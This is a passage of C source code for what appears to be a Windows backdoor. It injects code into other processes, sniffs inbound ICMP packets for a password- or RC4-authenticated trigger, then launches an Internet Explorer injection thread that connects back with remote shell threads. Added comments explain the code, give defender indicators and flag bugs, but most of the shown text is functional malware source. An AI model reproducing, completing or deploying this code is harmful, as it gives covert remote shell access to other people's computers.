	if (!IIEp->pWriteProcessMemory(IIEp->ie, IIEp->pWriteShellTParam,IIEp->lclpWriteShellTParam, sizeof(WriteShellTParam), 0 ) )return 0;
	if (!IIEp->pWriteProcessMemory(IIEp->ie, IIEp->pReadShellTParam,IIEp->lclpReadShellTParam, sizeof(ReadShellTParam), 0 ) )return 0;

	//IIEp->pMBox(0,IIEp->szCreateProcess ,"IIEp->szconnect",MB_OK);

	if(!IIEp->pCreateRemoteThread(IIEp->ie, 0, 0, (DWORD (__stdcall *)( void *)) IIEp->pIConnectThread, IIEp->pConnectParam, 0, &IIEp->rc )) return 0;

//	IIEp->pMBox(0,IIEp->szCreateProcess ,"IIEp->szconnect",MB_OK);

return 0;
}
/*
 * Address-only end marker for IStartInjectIEThread.
 *
 * Not called anywhere in this view. InjectIntoExplorer (below) computes
 * (EndIStartInjectIEThread - IStartInjectIEThread) and uses that difference
 * as the number of bytes of thread code to copy into the target process, so
 * the function exists purely so that its address follows the thread body in
 * the image. The body is intentionally empty; whether the linker actually
 * keeps these two functions adjacent is assumed, not guaranteed by the code.
 */
static void EndIStartInjectIEThread(void)
{
}
/*
 * SniffPackets -- thread body that watches every inbound IP datagram on the
 * host and treats a specially framed ICMP echo payload as the command to
 * start the IE-injection / connect-back threads.
 *
 * InjectIntoExplorer (below) measures this function as the byte range
 * [SniffPackets, EndSniffPackets) and copies it into another process, which
 * is presumably why every Win32/Winsock call goes through function pointers
 * and name strings carried in *sp (resolved here with sp->pLoadLibrary /
 * sp->pGetProcAddress) instead of ordinary imports: the body behaves as
 * position-dependent shellcode and references nothing from this module.
 *
 * Parameters:
 *   sp - injector-filled parameter block: DLL/export names, the local
 *        password in cleartext, socket and receive-buffer state, and the
 *        ConnectParam / IEParam blocks handed to the spawned thread. The
 *        layout (SniffParam, XData, IP_HDR, ECHOREQUEST) is defined elsewhere.
 * Returns:
 *   1 if a required export could not be resolved; otherwise the capture loop
 *   never exits (it has no break), so the trailing "return 0" is unreachable.
 *
 * Defender's view, grounded in the code below:
 *   - A raw IPPROTO_IP socket with SIO_RCVALL (receive all traffic on the
 *     bound interface) opened from a process that has no reason to capture
 *     packets is the host-side indicator.
 *   - The trigger is an inbound ICMP packet whose echo payload is a fixed
 *     XData frame delimited by 'c' bytes, either in the clear (password
 *     compared with lstrcmp) or RC4-encrypted under a key derived from
 *     MD5(szLocalPassword) through CryptDeriveKey.
 *   - szLocalPassword is held as a plain string in *sp, so it is recoverable
 *     from a memory image of the injected process.
 *   - No return value of WSAStartup/socket/bind/WSAIoctl/recv is checked; the
 *     receive buffer is parsed as a packet even when recv fails.
 */
DWORD WINAPI SniffPackets(SniffParam *sp)
{
//	sp->husr32 = sp->pLoadLibrary(sp->szuser32dll);
	// Load the three DLLs by the names the injector supplied (no static imports).
	sp->hwinsock = sp->pLoadLibrary(sp->szWs232 );
	sp->hk32 =sp->pLoadLibrary( sp->szkernel32dll);
	sp->hAdvapi =sp->pLoadLibrary( sp->szAdvapi32);
	// NOTE(review): both operands test hk32; hwinsock and hAdvapi are never
	// NULL-checked before being passed to pGetProcAddress below.
	if((sp->hk32==0)||(sp->hk32==0)) return 1;

//	sp->pMBox= (tMBox)sp->pGetProcAddress(sp->husr32,sp->szMessageBoxA );
	sp->pSleep = (tSleep)sp->pGetProcAddress(sp->hk32,sp->szSleep );
	sp->plstrcpy=(tlstrcpy)sp->pGetProcAddress(sp->hk32,sp->szlstrcpy );
	sp->plstrcmp=(tlstrcmp)sp->pGetProcAddress(sp->hk32,sp->szlstrcmp );
	
	
//	sp->pCreateFile=(tCreateFile)sp->pGetProcAddress(sp->hk32,sp->szCreateFile);
//	sp->pWriteFile=(tWriteFile)sp->pGetProcAddress(sp->hk32,sp->szWriteFile);
//	sp->pSetFilePointer=(tSetFilePointer)sp->pGetProcAddress(sp->hk32,sp->szSetFilePointer);
	sp->pinet_ntoa=(tinet_ntoa)sp->pGetProcAddress(sp->hwinsock,sp->szinet_ntoa);
	

	// Winsock exports used by the raw-socket capture loop.
	sp->pWSAStartup=(tWSAStartup)sp->pGetProcAddress( sp->hwinsock, sp->szWSAStartup);
	sp->psocket=(tsocket)sp->pGetProcAddress(sp->hwinsock, sp->szsocket );
	sp->pbind=(tbind)sp->pGetProcAddress( sp->hwinsock,sp->szbind);
	sp->precv=(trecv)sp->pGetProcAddress( sp->hwinsock, sp->szrecv);
	sp->pWSAIoctl=(tWSAIoctl)sp->pGetProcAddress( sp->hwinsock,sp->szWSAIoctl);
	// plstrcpy, plstrcmp and pinet_ntoa are resolved above but are not part of this check.
	if((sp->pSleep==0)||(sp->pWSAStartup==0)||(sp->psocket==0)||(sp->pbind==0)||(sp->precv==0)||(sp->pWSAIoctl==0))
	return 1;
	// CryptoAPI exports used to decrypt the encrypted trigger frame. None of
	// these pointers is NULL-checked before use in the loop below.
	sp->pCryptAcquireContext=(tCryptAcquireContext)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptAcquireContext);
	sp->pCryptCreateHash=(tCryptCreateHash)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptCreateHash);
	sp->pCryptHashData=(tCryptHashData)sp->pGetProcAddress( sp->hAdvapi,sp->szCryptHashData);
	sp->pCryptDeriveKey=(tCryptDeriveKey)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptDeriveKey);
	sp->pCryptDecrypt=(tCryptDecrypt)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptDecrypt);
	sp->pCryptDestroyKey=(tCryptDestroyKey)sp->pGetProcAddress( sp->hAdvapi,sp->szCryptDestroyKey);
	sp->pCryptDestroyHash=(tCryptDestroyHash)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptDestroyHash);
	sp->pCryptReleaseContext=(tCryptReleaseContext)sp->pGetProcAddress( sp->hAdvapi,sp->szCryptReleaseContext);
	sp->plstrlen=(tlstrlen)sp->pGetProcAddress(sp->hk32,sp->szlstrlen);

	// Token/privilege exports are resolved and checked, but the only code
	// that would call them is the commented-out block further down.
	sp->pOpenProcessToken=(tOpenProcessToken)sp->pGetProcAddress(sp->hAdvapi,sp->szOpenProcessToken);
	sp->pLookupPrivilegeValue=(tLookupPrivilegeValue)sp->pGetProcAddress(sp->hAdvapi,sp->szLookupPrivilegeValue);
	sp->pAdjustTokenPrivileges=(tAdjustTokenPrivileges)sp->pGetProcAddress(sp->hAdvapi,sp->szAdjustTokenPrivileges);
	sp->pCloseHandle=(tCloseHandle)sp->pGetProcAddress(sp->hk32,sp->szCloseHandle);
//	sp->pGetCurrentProcess=(tGetCurrentProcess)sp->pGetProcAddress(sp->hk32,sp->szGetCurrentProcess);
	if((sp->pOpenProcessToken==0)||(sp->pLookupPrivilegeValue==0)||(sp->pAdjustTokenPrivileges==0))
	return 1;
	


//enable Debug privilege -- disabled: this block (and the pGetCurrentProcess
//lookup it depends on) is commented out, so no privilege is adjusted here.
/*
	if ( !sp->pOpenProcessToken(sp->pGetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &sp->hToken ) )
	{
	sp->pMBox(0,sp->szlstrlen,"1",MB_OK);
	return 0;
	}

	if (!sp->pLookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sp->sedebugnameValue ))
	{
	sp->pMBox(0,sp->szCloseHandle,"1",MB_OK);
	sp->pCloseHandle(sp->hToken);
	return 0;
	}

	sp->tkp.PrivilegeCount = 1;
	sp->tkp.Privileges[0].Luid =sp->sedebugnameValue;
	sp->tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	sp->pAdjustTokenPrivileges(sp->hToken, FALSE, &sp->tkp, sizeof sp->tkp, NULL, NULL );
	sp->pCloseHandle(sp->hToken );
*/
////start routine
	// Raw IP socket bound to sp->sa (presumably a local interface address,
	// filled in by the injector -- confirm) with SIO_RCVALL enabled, i.e.
	// every inbound IP datagram on that interface is delivered to recv().
	// None of the four return values is checked.
	sp->pWSAStartup(MAKEWORD(2,1),&sp->wsaData);
	sp->sock = sp->psocket(AF_INET, SOCK_RAW, IPPROTO_IP);
	sp->pbind(sp->sock, (SOCKADDR *)&sp->sa, sizeof(sp->sa));
	sp->pWSAIoctl(sp->sock, SIO_RCVALL, &sp->optval, sizeof(sp->optval), NULL, 0, &sp->dwBytesRet, NULL, NULL);

	// Capture loop: never exits.
	while (1)
    {
	sp->pSleep(1);
	//sp->pZeroMemory((LPVOID)&sp->RcvBuf, sizeof(sp->RcvBuf));
	// recv result ignored: on failure or a short read the (stale) buffer is still parsed.
	sp->precv(sp->sock, sp->RcvBuf, sizeof(sp->RcvBuf), 0);
	IP_HDR *pIpheader;
	pIpheader = (IP_HDR *)sp->RcvBuf;
	//if(pIpheader->ip_protocol==IPPROTO_TCP)
	//sp->pMBox(0,sp->szrecv,sp->szrecv,MB_OK);

	// Only ICMP is inspected.
	if(pIpheader->ip_protocol==IPPROTO_ICMP)
	{		
	ECHOREQUEST *echoreg;
	// Assumes a 20-byte IP header (no IP options); the actual header length field is not consulted.
	echoreg=(ECHOREQUEST *)(sp->RcvBuf + 20);
	// XData (start, end, pass, ip, port -- layout defined elsewhere) overlays the echo payload.
	XData *xd=(XData *)&echoreg->cData;
	sp->saSource.sin_addr.s_addr = pIpheader->ip_srcaddr;	
	sp->Auth=FALSE;
	//sp->pMBox(0,sp->szlstrlen,echoreg->cData,MB_OK);	
	// Cleartext trigger: 'c' frame markers plus an exact lstrcmp against the local password.
	if((xd->start=='c')&&(xd->end=='c')){
	//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
	sp->pConnectParam->Encrypt=FALSE;
	if(sp->plstrcmp(sp->szLocalPassword,xd->pass)==0) sp->Auth=TRUE;
	else sp->Auth=FALSE;
	}
	else{	
	// Encrypted trigger: derive an RC4 key from MD5(szLocalPassword) and
	// decrypt the payload in place, then re-check the frame markers below.
	if (sp->pCryptAcquireContext(&sp->hProv, NULL, sp->CSP, PROV_RSA_FULL, 0))
		{		
		//sp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
			if (sp->pCryptCreateHash(sp->hProv, CALG_MD5, 0, 0, &sp->hHash))
			{
				sp->dwLength =sp->plstrlen(sp->szLocalPassword);
		//		sp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
				if (sp->pCryptHashData(sp->hHash, (BYTE *)sp->szLocalPassword, sp->dwLength, 0))
				{
	//			sp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
				if (sp->pCryptDeriveKey(sp->hProv, CALG_RC4, sp->hHash, CRYPT_EXPORTABLE, &sp->hKey))
					{
						//sp->dwLength =sp->plstrlen(echoreg->cData);
						// Fixed 26-byte frame; the real payload length is not consulted.
						sp->dwLength =26;
						sp->pCryptDecrypt(sp->hKey, 0, TRUE, 0, (BYTE *)echoreg->cData, &sp->dwLength);
						sp->pCryptDestroyKey(sp->hKey);
						//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
					}

				}

				sp->pCryptDestroyHash(sp->hHash);
			}
			sp->pCryptReleaseContext(sp->hProv, 0);
	}//crypt end	
//	sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
	// On this path only the markers are checked after decryption; xd->pass is not compared.
	if((xd->start=='c')&&(xd->end=='c')){ 
	//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
		sp->pConnectParam->Encrypt=TRUE;
		sp->Auth=TRUE;		
	}	
	}
	//sp->hf=sp->pCreateFile(sp->filename, GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
	//sp->pSetFilePointer(sp->hf,0 ,NULL,FILE_END);		
	//sp->pWriteFile(sp->hf,sp->pinet_ntoa(sp->saSource.sin_addr),16,&sp->dwBytes, NULL);
	//sp->pWriteFile(sp->hf,xd,32,&sp->dwBytes, NULL);
	//sp->pWriteFile (sp->hf, (LPVOID)sp->CR,2, &sp->dwBytes, NULL);
	//sp->pCloseHandle(sp->hf);	
	// Accepted frame: copy host/port from the frame into the connect parameters
	// and start the injection thread. One new thread per accepted packet;
	// sp->rc is simply overwritten. pCreateThread is not resolved in this
	// function -- presumably pre-filled by the injector (confirm).
	if(sp->Auth)
	{
	//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
	sp->plstrcpy(sp->pConnectParam->host,xd->ip);
	sp->pConnectParam->port=xd->port;
	sp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(sp->pIStartInjectIEThread), (LPVOID) sp->pIEParam,0,&sp->rc);
//	sp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(sp->pIConnectThread), (LPVOID) sp->pConnectParam,0,&sp->rc);
	}
	}
    }//end while
return 0;
}
/*
 * Address-only end marker for SniffPackets.
 *
 * Not called anywhere in this view. InjectIntoExplorer (below) computes
 * (EndSniffPackets - SniffPackets) and uses the difference as the number of
 * bytes of SniffPackets to copy into the target process. The body is
 * intentionally empty; the code relies on the linker placing this function
 * directly after SniffPackets, which is an assumption rather than a guarantee.
 */
static void EndSniffPackets(void)
{
}
// Shared static storage filled and returned by GetLocalIP(); every caller
// receives a pointer to this same buffer, and on lookup failure it keeps
// whatever it previously held (initially all zero, i.e. an empty string).
char localip[255];
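/*
 * GetLocalIP - resolve this host's own name and return its first IPv4 address
 * as a dotted-quad string.
 *
 * Returns a pointer to the shared global buffer `localip`. On any failure
 * (WSAStartup, gethostname, gethostbyname, or a host entry with no address)
 * the buffer is returned unchanged, so the caller gets an empty string on the
 * first call and a stale value afterwards. Not safe to call concurrently:
 * every caller shares the one buffer.
 *
 * Changes from the original: `hostinfo->h_addr_list[0]` is checked before it
 * is dereferenced (a resolvable name with an empty address list would have
 * crashed here), and the copy is bounded to the size of `localip`.
 */
char* GetLocalIP(){
	WORD wVersionRequested = MAKEWORD( 2, 0 );
	WSADATA wsaData;
	char name[255] = {0};
	PHOSTENT hostinfo = NULL;

	if ( WSAStartup( wVersionRequested, &wsaData ) == 0 )
	{
		if( gethostname ( name, sizeof(name)) == 0)
		{
			hostinfo = gethostbyname(name);
			/* h_addr_list can be empty; the original dereferenced entry 0 unconditionally. */
			if( hostinfo != NULL && hostinfo->h_addr_list != NULL && hostinfo->h_addr_list[0] != NULL)
			{
				/* inet_ntoa yields at most 15 characters, but bound the copy anyway. */
				lstrcpyn(localip, inet_ntoa (*(struct in_addr *)hostinfo->h_addr_list[0]), (int)sizeof(localip));
			}
		}

		/* Balances the successful WSAStartup above (reference counted). */
		WSACleanup( );
	}

	return localip;
}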

BOOL InjectIntoExplorer( HANDLE h )
{
	HANDLE ht = 0;
	SniffParam lclsniffpar;
	SniffParam *orgsniffpar;
	ConnectParam lclconnectpar;
	ConnectParam *orgconnectpar;
	ReadShellTParam *orgreadshellpar;
	ReadShellTParam lclreadshellpar;
	WriteShellTParam *orgwriteshellpar;
	WriteShellTParam lclwriteshellpar;
	IEParam *orgieparam;
	IEParam lclieparam;
	void *preadshellthread = 0;
	void *pwriteshellthread = 0;
	void *psniffthread = 0;
	void *piconnecthread = 0;
	void *pIEStartInjectThread = 0;
	DWORD rc;
	HMODULE hlib;
	int SniffTCodeSize;
	int ConnectTCodeSize;
	int RShellTCodeSize;
	int WShellTCodeSize;
	int IEStartInjectCodeSize;
	//	Calculating size of Remote threads..

	unsigned long p1=(unsigned long )(PBYTE)EndSniffPackets;
	unsigned long p2=(unsigned long )(PBYTE)SniffPackets;
	SniffTCodeSize = (int)(p1-p2);
	p1=(unsigned long )(PBYTE)EndISessionReadShellThread;
	p2=(unsigned long )(PBYTE)ISessionReadShellThread;
	RShellTCodeSize = (int)(p1-p2);
	p1=(unsigned long )(PBYTE)EndISessionWriteShellThread;
	p2=(unsigned long )(PBYTE)ISessionWriteShellThread;
	WShellTCodeSize = (int)(p1-p2);
	p1=(unsigned long )(PBYTE)EndIConnectThread;
	p2=(unsigned long )(PBYTE)IConnectThread;
	ConnectTCodeSize = (int)(p1-p2);

	p1=(unsigned long )(PBYTE)EndIStartInjectIEThread;
	p2=(unsigned long )(PBYTE)IStartInjectIEThread;
	IEStartInjectCodeSize = (int)(p1-p2);

//  allocate memory for code
	do{
	psniffthread = VirtualAllocEx( h, 0, SniffTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( psniffthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
	break;
	}
	piconnecthread = VirtualAllocEx( h, 0, ConnectTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( piconnecthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
		break;
	}

	preadshellthread = VirtualAllocEx( h, 0, RShellTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( preadshellthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
		break;
	}
	pwriteshellthread = VirtualAllocEx( h, 0, WShellTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( 	pwriteshellthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
		break;
	}
	pIEStartInjectThread = VirtualAllocEx( h, 0, IEStartInjectCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( 	pIEStartInjectThread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
	break;
	}
//////////////////////////////
// Allocate memory for data

	orgieparam = (IEParam  *) VirtualAllocEx( h, 0, sizeof(IEParam ), MEM_COMMIT, PAGE_READWRITE );
	if ( orgieparam == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}

	orgconnectpar = (ConnectParam *) VirtualAllocEx( h, 0, sizeof(ConnectParam), MEM_COMMIT, PAGE_READWRITE );
	if ( orgconnectpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}
	orgsniffpar = (SniffParam *) VirtualAllocEx( h, 0, sizeof(SniffParam), MEM_COMMIT, PAGE_READWRITE );
	if ( orgsniffpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}

	orgwriteshellpar = (WriteShellTParam *) VirtualAllocEx( h, 0, sizeof(WriteShellTParam), MEM_COMMIT, PAGE_READWRITE );
	if ( orgwriteshellpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}
	orgreadshellpar = (ReadShellTParam *) VirtualAllocEx( h, 0, sizeof(ReadShellTParam), MEM_COMMIT, PAGE_READWRITE );
	if (orgreadshellpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
